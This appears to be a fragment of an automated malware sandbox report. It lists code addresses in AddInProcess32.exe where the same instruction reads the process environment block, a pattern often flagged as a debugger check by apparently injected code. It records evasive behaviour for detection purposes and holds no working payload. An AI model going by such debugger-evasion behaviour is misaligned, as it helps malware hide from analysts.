Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113 mov eax, dword ptr fs:[00000030h]	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151A130 mov eax, dword ptr fs:[00000030h]	1_2_0151A130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C7128 mov eax, dword ptr fs:[00000030h]	1_2_014C7128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C7128 mov eax, dword ptr fs:[00000030h]	1_2_014C7128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F13E mov eax, dword ptr fs:[00000030h]	1_2_0154F13E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A01C0 mov eax, dword ptr fs:[00000030h]	1_2_014A01C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A01C0 mov eax, dword ptr fs:[00000030h]	1_2_014A01C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A51C0 mov eax, dword ptr fs:[00000030h]	1_2_014A51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A51C0 mov eax, dword ptr fs:[00000030h]	1_2_014A51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A51C0 mov eax, dword ptr fs:[00000030h]	1_2_014A51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A51C0 mov eax, dword ptr fs:[00000030h]	1_2_014A51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014881EB mov eax, dword ptr fs:[00000030h]	1_2_014881EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149A1E3 mov eax, dword ptr fs:[00000030h]	1_2_0149A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149A1E3 mov eax, dword ptr fs:[00000030h]	1_2_0149A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149A1E3 mov eax, dword ptr fs:[00000030h]	1_2_0149A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149A1E3 mov eax, dword ptr fs:[00000030h]	1_2_0149A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149A1E3 mov eax, dword ptr fs:[00000030h]	1_2_0149A1E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0 mov eax, dword ptr fs:[00000030h]	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014991E5 mov eax, dword ptr fs:[00000030h]	1_2_014991E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014991E5 mov eax, dword ptr fs:[00000030h]	1_2_014991E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014891F0 mov eax, dword ptr fs:[00000030h]	1_2_014891F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014891F0 mov eax, dword ptr fs:[00000030h]	1_2_014891F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015581EE mov eax, dword ptr fs:[00000030h]	1_2_015581EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015581EE mov eax, dword ptr fs:[00000030h]	1_2_015581EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A01F1 mov eax, dword ptr fs:[00000030h]	1_2_014A01F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A01F1 mov eax, dword ptr fs:[00000030h]	1_2_014A01F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A01F1 mov eax, dword ptr fs:[00000030h]	1_2_014A01F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF1F0 mov eax, dword ptr fs:[00000030h]	1_2_014BF1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF1F0 mov eax, dword ptr fs:[00000030h]	1_2_014BF1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01494180 mov eax, dword ptr fs:[00000030h]	1_2_01494180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01494180 mov eax, dword ptr fs:[00000030h]	1_2_01494180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01494180 mov eax, dword ptr fs:[00000030h]	1_2_01494180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1190 mov eax, dword ptr fs:[00000030h]	1_2_014D1190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D1190 mov eax, dword ptr fs:[00000030h]	1_2_014D1190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B9194 mov eax, dword ptr fs:[00000030h]	1_2_014B9194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015651B6 mov eax, dword ptr fs:[00000030h]	1_2_015651B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE1A4 mov eax, dword ptr fs:[00000030h]	1_2_014CE1A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE1A4 mov eax, dword ptr fs:[00000030h]	1_2_014CE1A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C31BE mov eax, dword ptr fs:[00000030h]	1_2_014C31BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C31BE mov eax, dword ptr fs:[00000030h]	1_2_014C31BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C41BB mov ecx, dword ptr fs:[00000030h]	1_2_014C41BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C41BB mov eax, dword ptr fs:[00000030h]	1_2_014C41BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C41BB mov eax, dword ptr fs:[00000030h]	1_2_014C41BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C0044 mov eax, dword ptr fs:[00000030h]	1_2_014C0044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0156505B mov eax, dword ptr fs:[00000030h]	1_2_0156505B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491051 mov eax, dword ptr fs:[00000030h]	1_2_01491051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491051 mov eax, dword ptr fs:[00000030h]	1_2_01491051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01539060 mov eax, dword ptr fs:[00000030h]	1_2_01539060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01497072 mov eax, dword ptr fs:[00000030h]	1_2_01497072
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01496074 mov eax, dword ptr fs:[00000030h]	1_2_01496074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01496074 mov eax, dword ptr fs:[00000030h]	1_2_01496074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01498009 mov eax, dword ptr fs:[00000030h]	1_2_01498009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B5004 mov eax, dword ptr fs:[00000030h]	1_2_014B5004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B5004 mov ecx, dword ptr fs:[00000030h]	1_2_014B5004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2010 mov ecx, dword ptr fs:[00000030h]	1_2_014D2010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148D02D mov eax, dword ptr fs:[00000030h]	1_2_0148D02D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AB0D0 mov eax, dword ptr fs:[00000030h]	1_2_014AB0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B0D6 mov eax, dword ptr fs:[00000030h]	1_2_0148B0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B0D6 mov eax, dword ptr fs:[00000030h]	1_2_0148B0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B0D6 mov eax, dword ptr fs:[00000030h]	1_2_0148B0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148B0D6 mov eax, dword ptr fs:[00000030h]	1_2_0148B0D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014890F8 mov eax, dword ptr fs:[00000030h]	1_2_014890F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014890F8 mov eax, dword ptr fs:[00000030h]	1_2_014890F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014890F8 mov eax, dword ptr fs:[00000030h]	1_2_014890F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014890F8 mov eax, dword ptr fs:[00000030h]	1_2_014890F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CD0F0 mov eax, dword ptr fs:[00000030h]	1_2_014CD0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CD0F0 mov ecx, dword ptr fs:[00000030h]	1_2_014CD0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148C0F6 mov eax, dword ptr fs:[00000030h]	1_2_0148C0F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01564080 mov eax, dword ptr fs:[00000030h]	1_2_01564080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148C090 mov eax, dword ptr fs:[00000030h]	1_2_0148C090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148A093 mov ecx, dword ptr fs:[00000030h]	1_2_0148A093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015650B7 mov eax, dword ptr fs:[00000030h]	1_2_015650B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D00A5 mov eax, dword ptr fs:[00000030h]	1_2_014D00A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153F0A5 mov eax, dword ptr fs:[00000030h]	1_2_0153F0A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154B0AF mov eax, dword ptr fs:[00000030h]	1_2_0154B0AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01488347 mov eax, dword ptr fs:[00000030h]	1_2_01488347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01488347 mov eax, dword ptr fs:[00000030h]	1_2_01488347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01488347 mov eax, dword ptr fs:[00000030h]	1_2_01488347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CA350 mov eax, dword ptr fs:[00000030h]	1_2_014CA350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E372 mov eax, dword ptr fs:[00000030h]	1_2_0150E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E372 mov eax, dword ptr fs:[00000030h]	1_2_0150E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E372 mov eax, dword ptr fs:[00000030h]	1_2_0150E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150E372 mov eax, dword ptr fs:[00000030h]	1_2_0150E372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149B360 mov eax, dword ptr fs:[00000030h]	1_2_0149B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE363 mov eax, dword ptr fs:[00000030h]	1_2_014CE363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B237A mov eax, dword ptr fs:[00000030h]	1_2_014B237A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01489303 mov eax, dword ptr fs:[00000030h]	1_2_01489303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01489303 mov eax, dword ptr fs:[00000030h]	1_2_01489303
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C631F mov eax, dword ptr fs:[00000030h]	1_2_014C631F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AE310 mov eax, dword ptr fs:[00000030h]	1_2_014AE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AE310 mov eax, dword ptr fs:[00000030h]	1_2_014AE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AE310 mov eax, dword ptr fs:[00000030h]	1_2_014AE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151330C mov eax, dword ptr fs:[00000030h]	1_2_0151330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151330C mov eax, dword ptr fs:[00000030h]	1_2_0151330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151330C mov eax, dword ptr fs:[00000030h]	1_2_0151330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0151330C mov eax, dword ptr fs:[00000030h]	1_2_0151330C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F30A mov eax, dword ptr fs:[00000030h]	1_2_0154F30A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E328 mov eax, dword ptr fs:[00000030h]	1_2_0148E328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E328 mov eax, dword ptr fs:[00000030h]	1_2_0148E328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E328 mov eax, dword ptr fs:[00000030h]	1_2_0148E328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01563336 mov eax, dword ptr fs:[00000030h]	1_2_01563336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B332D mov eax, dword ptr fs:[00000030h]	1_2_014B332D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C8322 mov eax, dword ptr fs:[00000030h]	1_2_014C8322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C8322 mov eax, dword ptr fs:[00000030h]	1_2_014C8322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C8322 mov eax, dword ptr fs:[00000030h]	1_2_014C8322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014963CB mov eax, dword ptr fs:[00000030h]	1_2_014963CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015143D5 mov eax, dword ptr fs:[00000030h]	1_2_015143D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E3C0 mov eax, dword ptr fs:[00000030h]	1_2_0148E3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E3C0 mov eax, dword ptr fs:[00000030h]	1_2_0148E3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148E3C0 mov eax, dword ptr fs:[00000030h]	1_2_0148E3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148C3C7 mov eax, dword ptr fs:[00000030h]	1_2_0148C3C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C33D0 mov eax, dword ptr fs:[00000030h]	1_2_014C33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C43D0 mov ecx, dword ptr fs:[00000030h]	1_2_014C43D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380 mov eax, dword ptr fs:[00000030h]	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380 mov eax, dword ptr fs:[00000030h]	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380 mov eax, dword ptr fs:[00000030h]	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380 mov eax, dword ptr fs:[00000030h]	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380 mov eax, dword ptr fs:[00000030h]	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AF380 mov eax, dword ptr fs:[00000030h]	1_2_014AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BA390 mov eax, dword ptr fs:[00000030h]	1_2_014BA390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BA390 mov eax, dword ptr fs:[00000030h]	1_2_014BA390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BA390 mov eax, dword ptr fs:[00000030h]	1_2_014BA390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F38A mov eax, dword ptr fs:[00000030h]	1_2_0154F38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150C3B0 mov eax, dword ptr fs:[00000030h]	1_2_0150C3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014993A6 mov eax, dword ptr fs:[00000030h]	1_2_014993A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014993A6 mov eax, dword ptr fs:[00000030h]	1_2_014993A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150D250 mov eax, dword ptr fs:[00000030h]	1_2_0150D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0150D250 mov ecx, dword ptr fs:[00000030h]	1_2_0150D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BF24A mov eax, dword ptr fs:[00000030h]	1_2_014BF24A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154F247 mov eax, dword ptr fs:[00000030h]	1_2_0154F247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155124C mov eax, dword ptr fs:[00000030h]	1_2_0155124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155124C mov eax, dword ptr fs:[00000030h]	1_2_0155124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155124C mov eax, dword ptr fs:[00000030h]	1_2_0155124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155124C mov eax, dword ptr fs:[00000030h]	1_2_0155124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154D270 mov eax, dword ptr fs:[00000030h]	1_2_0154D270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152327E mov eax, dword ptr fs:[00000030h]	1_2_0152327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152327E mov eax, dword ptr fs:[00000030h]	1_2_0152327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152327E mov eax, dword ptr fs:[00000030h]	1_2_0152327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152327E mov eax, dword ptr fs:[00000030h]	1_2_0152327E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0152327E mov eax, dword ptr fs:[00000030h]	1_2_0152327E
